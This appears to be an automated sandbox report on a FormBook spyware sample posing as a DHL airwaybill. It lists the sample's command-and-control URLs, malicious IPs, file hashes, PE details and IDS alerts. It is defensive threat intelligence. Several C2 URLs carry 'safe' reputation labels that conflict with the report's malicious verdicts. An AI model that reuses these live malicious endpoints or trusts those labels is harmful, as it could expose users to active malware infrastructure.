              http://www.omexai.info/v7i9/?FR=gVd2Q54c4wAw8FSZkJGisnGWxrnrZZv7nPVFwBxZuIdr/R+LakyKOxGnexM5cwgplfvhbdxFrnk6Pq1kbTlH0ZjmVJXvVLu8DIcVEX5jt3TfiQ8a19HD/2BSGQQXtF0fkmM7X0U=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.1win-moldovia.fun/4jz5/true
              • Avira URL Cloud: safe
              		unknown
              http://www.thewhitediamond.org/j05r/true
              • Avira URL Cloud: safe
              		unknown
              http://www.030003678.xyz/wft4/?FR=YTkKwJ8ciWwfk9EboTVmJ8A8z5nQoA6H/11M7sDGKdLnpvCCOp1eIxB3H/IGbE8NJw3dU7UJgJnjxevpFaH+9r0+hPUAaenfY1NUgmg0rJlUJj6QFUl1BdaUrKMG7GtZPuGkbd0=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.030002721.xyz/i28e/?yXghy=KTox&FR=aGpxVX6kGAU+vZyZZfJTCDz7/lPsBFWDos3dY6ZsNYZMPz7BIFF7kPeLI34j35LFjHkoTmJm1HUVC8sGZtVHFfldRMYhCGprZu/MBi0oweQaoGEXOF433+gvsUsQ2wF2VEo07O8=true
              • Avira URL Cloud: safe
              		unknown
              http://www.easyanalytics.site/d029/?FR=cslaSIgu4SK5hEDj9hUVBt4DVeSxODrxiV3UUYpYDpvuIfyXRHc3+9hbGUkpPVL7vSNSmH7KmnD+rq4wgj4O7IkekeXb2lWER124D4kOUSFtT1194nz+plZg+E7GwvWNw7cZgDY=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.moveon.cat/bb55/?FR=qdzUF+C4KgbVJvWmmn8R5hRL/2fqEFiYhougQvjggmODZzWjY8rbJBXd+0mtuuLK6ozYWyaagBrSOvtROhupesjxef+9ZK6Rgj9rnagPgpTk5Eewhqg4wMCweUmjwTCKS2nymHQ=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.henrry.top/uq6q/?FR=9Otm+20UpUikA6x0VD212tqxG3jyIPcWfHFyJTdbxKGeDxDVLjdT/4jyPXypOz+d9yZQrKELvtj6jM/m3RUo26f0zJnEKMWuurbJZWWdFjqlgtWZigu2A/olrWAWySRFQjrMuco=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.sorriragora.online/wxmz/?FR=/3704Vff3w19bJxFjboY/IbcCRxq7QB064cYUEYQjha4p4PIlcXs4dWmoF91tthlGgXSeDBpFM7AphPZ13xvSCd02IeXzvs2jATKINKka4nP9dH8TaBgBhg9ZbFNrO+hXaJ7nrQ=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.aflaksokna.com/539x/?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7D2LL7MCvEOQVB7xyJGTP+28tzk4zfIPRYPtsAwCb1rqdvGtj+iK/r6v/IcJfZgSJV4K5VQUlSITkxaZv9eo0HTeJgk=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.lumixy.online/so9n/true
              • Avira URL Cloud: safe
              		unknown
              http://www.easyanalytics.site/d029/true
              • Avira URL Cloud: safe
              		unknown
              http://www.homebizsuccess.blog/xvas/?FR=J9/McS+K1SnUK1dFtfBkoa6WP04kmDmbslaJUnd233GmVE8UX2CUiD/aW92xdqFDEXAl7OPacYUbAp8GfP4HaHix7g4VEpF6t7or8oS92HRG4MEXui+46ttkhOnPdDZiG6qh46k=&yXghy=KToxtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.hm62t.top/gd7t/true
              • Avira URL Cloud: safe
              		unknown
              http://www.hm62t.top/gd7t/?yXghy=KTox&FR=JlAcjlx2Gdg+DXM3i59+nmMFZHdISfOX/D3i1++YLzSS1YHv0m41CgGfSm0I/piMileZ/olvBUKxdIaFHHAoN7eK5KUeh7JInwAPNKMw/FJo5s/UjYShm5Z/UsIKNOFZiX+3bL8=true
              • Avira URL Cloud: safe
              		unknown
              http://www.1win-moldovia.fun/4jz5/?yXghy=KTox&FR=r5SoQQ/DZBXKP6QrNwGfWrJNBN6t0nUZU0GWsfQ0/kE9qy9dgr2+a8OrPCjBDi0TM6SD7wE/mt75vEwxSaGxWB73VkpxOVd4no3A+iHSW7NgpDpMEtZ9JlGQE1ss8/xFDzn1hco=true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabmshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://homebizsuccess.blog/xvas/?FR=J9/McStoceDGfrPzLv.exe, 00000005.00000002.4607553499.000000000438A000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003DDA000.00000004.10000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/ac/?q=mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.ecosia.org/newtab/mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000051AC000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000004BFC000.00000004.10000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ac.ecosia.org/autocomplete?q=mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nginx.net/toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000041F8000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003C48000.00000004.10000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://fedoraproject.org/toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000041F8000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003C48000.00000004.10000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csstoceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000049D2000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000004422000.00000004.10000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.moveon.cattoceDGfrPzLv.exe, 00000005.00000002.4609561064.0000000005FCC000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              162.240.81.18
              		sorriragora.onlineUnited States
              		46606UNIFIEDLAYER-AS-1UStrue
              91.215.85.23
              		kalomor.topRussian Federation
              		34665PINDC-ASRUtrue
              5.144.130.52
              		aflaksokna.comIran (ISLAMIC Republic Of)
              		59441HOSTIRAN-NETWORKIRtrue
              121.199.37.19
              		www.henrry.topChina
              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
              65.21.196.90
              		030002721.xyzUnited States
              		199592CP-ASDEtrue
              184.94.212.115
              		www.lumixy.onlineUnited States
              		394896VXCHNGE-NC01UStrue
              188.114.96.3
              		www.1win-moldovia.funEuropean Union
              		13335CLOUDFLARENETUStrue
              162.241.226.190
              		easyanalytics.siteUnited States
              		46606UNIFIEDLAYER-AS-1UStrue
              154.23.184.240
              		hm62t.topUnited States
              		174COGENT-174UStrue
              192.185.16.209
              		homebizsuccess.blogUnited States
              		46606UNIFIEDLAYER-AS-1UStrue
              3.33.130.190
              		thewhitediamond.orgUnited States
              		8987AMAZONEXPANSIONGBtrue
              217.160.0.193
              		www.moveon.catGermany
              		8560ONEANDONE-ASBrauerstrasse48DEtrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1505412
              Start date and time:2024-09-06 09:03:26 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 11m 2s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:11
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:DHL airwaybill # 6913321715 & BL Draft copy.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@7/2@15/12
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 124
              • Number of non-executed functions: 301
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              03:04:20API Interceptor1x Sleep call for process: DHL airwaybill # 6913321715 & BL Draft copy.exe modified
              03:05:20API Interceptor11696730x Sleep call for process: mshta.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              162.240.81.18yyyyyyyy.exeGet hashmaliciousFormBookBrowse
              • www.bellaflory.online/ituf/?zx=TzUh&EN-hu=YEtZDn0tA7DyZih9mnEB6iyoKUlvFjNFey9C//wFiDDFSyoO5eWV3ZKTc+ZVO1r+PL1l+P0OBuxLEWCpqZjHLSt270GmuGdydD8IJidQLk1z2EFl8w==
              rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
              • www.agoraeubebo.com/rs2o/
              4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
              • www.agoraeubebo.com/rs2o/
              MV ALIADO - S-REQ-19-00064 List items.exeGet hashmaliciousFormBookBrowse
              • www.7hubmt.online/xbib/
              MV ALIADO - S-REQ-19-00064.7Z.exeGet hashmaliciousFormBookBrowse
              • www.7hubmt.online/xbib/
              176654 Grade B2FA, BRF-MBO2 & CX2OB.exeGet hashmaliciousFormBookBrowse
              • www.7hubmt.online/xbib/
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • www.meery.store/tqpd/
              sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
              • www.agoraeubebo.com/niik/
              PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
              • www.meery.store/tqpd/
              Document_pdf.exeGet hashmaliciousFormBookBrowse
              • www.sorriragora.online/55a7/
              91.215.85.23PO#86637.exeGet hashmaliciousFormBookBrowse
              • www.kalomor.top/1i25/
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • www.kalomor.top/1i25/
              PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
              • www.kalomor.top/1i25/
              mAhetaoScY.exeGet hashmaliciousRedLine, SectopRATBrowse
              • 91.215.85.23:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
              5.144.130.52p4LNUqyKZM.exeGet hashmaliciousFormBookBrowse
              • www.aflaksokna.com/ifo8/
              PO_987654345678.exeGet hashmaliciousFormBookBrowse
              • www.aflaksokna.com/ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8
              INV20240828.exeGet hashmaliciousFormBookBrowse
              • www.aflaksokna.com/ifo8/

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              HOSTIRAN-NETWORKIRp4LNUqyKZM.exeGet hashmaliciousFormBookBrowse
              • 5.144.130.52
              PO_987654345678.exeGet hashmaliciousFormBookBrowse
              • 5.144.130.52
              DOCUMENTS.vbsGet hashmaliciousAgentTeslaBrowse
              • 5.144.130.41
              INV20240828.exeGet hashmaliciousFormBookBrowse
              • 5.144.130.52
              Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
              • 5.144.130.41
              rDHL_PT563857935689275783656385FV-GDS3535353.batGet hashmaliciousFormBook, GuLoaderBrowse
              • 185.83.114.124
              rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
              • 185.83.114.124
              Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 5.144.130.49
              PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 5.144.130.49
              PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 5.144.130.49
              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdhttps://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
              • 203.107.62.211
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • 47.104.180.139
              firmware.armv4l.elfGet hashmaliciousUnknownBrowse
              • 116.62.79.152
              firmware.armv7l.elfGet hashmaliciousUnknownBrowse
              • 120.27.222.47
              firmware.i586.elfGet hashmaliciousUnknownBrowse
              • 120.27.222.47
              firmware.mipsel.elfGet hashmaliciousUnknownBrowse
              • 47.115.225.16
              arm.elfGet hashmaliciousMirai, MoobotBrowse
              • 39.106.246.150
              firmware.sh4.elfGet hashmaliciousUnknownBrowse
              • 121.43.75.182
              debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
              • 8.147.250.92
              firmware.x86_64.elfGet hashmaliciousUnknownBrowse
              • 60.205.149.117
              UNIFIEDLAYER-AS-1UShttp://icit.fr/tsrwGet hashmaliciousUnknownBrowse
              • 50.6.152.246
              https://fdh.lil.mybluehost.me/login/Get hashmaliciousUnknownBrowse
              • 50.6.152.246
              https://segurancanosdados.com/principal.htmlGet hashmaliciousUnknownBrowse
              • 162.240.81.81
              yyyyyyyy.exeGet hashmaliciousFormBookBrowse
              • 162.240.81.18
              https://portal.ritedose.com/Get hashmaliciousUnknownBrowse
              • 50.87.173.19
              https://click.v1.tecsoldas.com.br/Get hashmaliciousUnknownBrowse
              • 50.6.171.226
              1V8XAuKZqe.exeGet hashmaliciousFormBookBrowse
              • 69.49.230.198
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • 162.241.226.190
              http://sepromac.com.mxGet hashmaliciousUnknownBrowse
              • 192.185.131.118
              6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
              • 50.6.160.61
              PINDC-ASRUPO#86637.exeGet hashmaliciousFormBookBrowse
              • 91.215.85.23
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • 91.215.85.23
              PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
              • 91.215.85.23
              http://www.notice-ausreport.com/notice-ausreport.com:443Get hashmaliciousUnknownBrowse
              • 91.215.85.79
              factura-630.900.exeGet hashmaliciousFormBookBrowse
              • 91.215.85.22
              PAGO $630.900.exeGet hashmaliciousFormBookBrowse
              • 91.215.85.22
              https://recommend2u.com/?gclid=Get hashmaliciousUnknownBrowse
              • 91.215.85.19
              https://sneakerdrawp.com/?gclid=Get hashmaliciousUnknownBrowse
              • 91.215.85.19
              SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
              • 45.128.199.107
              https://book2businessonline.com/?gclid=#gad_source=1Get hashmaliciousUnknownBrowse
              • 91.215.85.51

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL airwaybill # 6913321715 & BL Draft copy.exe.log

              Download File
              Process:C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.34331486778365
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
              MD5:1330C80CAAC9A0FB172F202485E9B1E8
              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
              Malicious:true
              Reputation:high, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

              C:\Users\user\AppData\Local\Temp\14_8-J-J8

              Download File
              Process:C:\Windows\SysWOW64\mshta.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
              Category:dropped
              Size (bytes):196608
              Entropy (8bit):1.1239949490932863
              Encrypted:false
              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
              MD5:271D5F995996735B01672CF227C81C17
              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
              Malicious:false
              Reputation:high, very likely benign file
              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.761517328598754
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              • Win32 Executable (generic) a (10002005/4) 49.75%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Windows Screen Saver (13104/52) 0.07%
              • Generic Win/DOS Executable (2004/3) 0.01%
              File name:DHL airwaybill # 6913321715 & BL Draft copy.exe
              File size:776'704 bytes
              MD5:7e3feacbde086188081c1fa2c0891090
              SHA1:c3a3e3d1c8d8d716ce7ce4d2e3a32271d75fdbda
              SHA256:07374ff867cc60e550cbae355fbb87e46eb76fc7cd74ba4005125d1ac3329e52
              SHA512:b298c29d355b2480c386397ab813137358ea231ef6eade981e24caaafa2f63647d216ec2f0868e9d990bec5769e3915ca0783a476925b43e8e3eccff14da32b5
              SSDEEP:12288:kUdmlTiE1brjykN9BFn0AO7YE/OEiR64VP93mG7lRYyAIrjkw0q:9WTt1bfJn0IEiR64D57XYyuw
              TLSH:35F412946648C817CA1852B84EB1F1781BBC6EDDB812E393AFD9ADFFBD66B050D00147
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f..............0.............J.... ........@.. .......................@............@................................

              File Icon

              Icon Hash:5614041456560606

              Static PE Info

              General

              Entrypoint:0x4be94a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x66D7B323 [Wed Sep 4 01:08:51 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Entrypoint Preview

              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xbe8f80x4f.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000xb9c.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0xbc5ec0x54.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000xbc9500xbca00a6a8c98c6d797541cfc5f8e864fc674aFalse0.9116563638999338data7.771292073435149IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0xc00000xb9c0xc00744a0e235df6a7b49d5ca7b7a8b3b79bFalse0.4557291666666667data4.990412533135448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0xc20000xc0x200f7d5485cb336ab764b56770ef680649fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xc00c80x7a0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.5
              RT_GROUP_ICON0xc08780x14data1.05
              RT_VERSION0xc089c0x2fcdata0.443717277486911

              Imports

              DLLImport
              mscoree.dll_CorExeMain

              Network Behavior

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-09-06T09:04:58.073868+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6497233.33.130.19080TCP
              2024-09-06T09:04:58.073868+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6497233.33.130.19080TCP
              2024-09-06T09:05:13.887462+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64972565.21.196.9080TCP
              2024-09-06T09:05:16.457325+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64972765.21.196.9080TCP
              2024-09-06T09:05:18.984331+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64972865.21.196.9080TCP
              2024-09-06T09:05:21.548286+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64972965.21.196.9080TCP
              2024-09-06T09:05:21.548286+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64972965.21.196.9080TCP
              2024-09-06T09:05:27.680015+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649731162.240.81.1880TCP
              2024-09-06T09:05:30.217391+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649732162.240.81.1880TCP
              2024-09-06T09:05:32.775792+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649733162.240.81.1880TCP
              2024-09-06T09:05:35.323271+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649734162.240.81.1880TCP
              2024-09-06T09:05:35.323271+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649734162.240.81.1880TCP
              2024-09-06T09:05:41.648087+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649736192.185.16.20980TCP
              2024-09-06T09:05:44.232124+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649737192.185.16.20980TCP
